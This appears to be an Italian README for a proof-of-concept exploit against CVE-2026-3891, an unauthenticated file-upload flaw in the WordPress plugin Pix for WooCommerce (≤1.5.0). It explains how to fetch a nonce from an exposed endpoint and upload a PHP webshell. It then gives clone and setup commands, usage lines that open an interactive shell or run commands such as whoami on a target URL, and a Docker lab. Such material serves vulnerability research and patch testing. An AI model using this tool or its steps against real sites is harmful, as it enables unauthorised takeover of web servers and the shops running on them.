
Pix for WooCommerce <= 1.5.0 - Caricamento arbitrario di file non autenticato (CVE-2026-3891) PoC
CVE-2026-3891 è una vulnerabilità di caricamento arbitrario di file non autenticato nel plugin WordPress Pix for WooCommerce. Il plugin espone un endpoint AJAX (lkn_pix_for_woocommerce_c6_save_settings) che accetta il caricamento di file di certificati senza alcuna autenticazione. Un nonce può essere ottenuto senza autenticazione tramite un secondo endpoint esposto (lkn_pix_for_woocommerce_generate_nonce), consentendo a un attaccante completamente non autenticato di caricare file arbitrari — inclusi webshell PHP — direttamente nella root web.
Versioni interessate: payment-gateway-pix-for-woocommerce <= 1.5.0
--commandgit clone https://github.com/joshuavanderpoll/CVE-2026-3891.git
cd CVE-2026-3891
python3 -m venv .venv
source .venv/bin/activate
pip3 install -r requirements.txt
git clone https://github.com/joshuavanderpoll/CVE-2026-3891.git
cd CVE-2026-3891
python3 -m venv .venv
.venv\Scripts\activate
pip3 install -r requirements.txt
python3 CVE-2026-3891.py --url <TARGET_URL> [--command <CMD>] [--timeout <SECONDS>] [--useragent <UA>]
Sfrutta il target e accedi a una sessione shell interattiva persistente per eseguire più comandi.
python3 CVE-2026-3891.py --url 'https://target.com'

Esegui un singolo comando sul target e stampa l'output, utile per script o controlli rapidi.
python3 CVE-2026-3891.py --url 'https://target.com' --command whoami
Comando singolo
Un ambiente Docker Compose autonomo con il software vulnerabile per test locali. Consulta DOCKER.md per maggiori dettagli
cd docker/
docker compose up -d
python3 CVE-2026-3891.py --url 'http://localhost:8080'
Questo strumento è fornito esclusivamente a scopo educativo e di ricerca. Il creatore non si assume alcuna responsabilità per usi impropri o danni causati da questo strumento.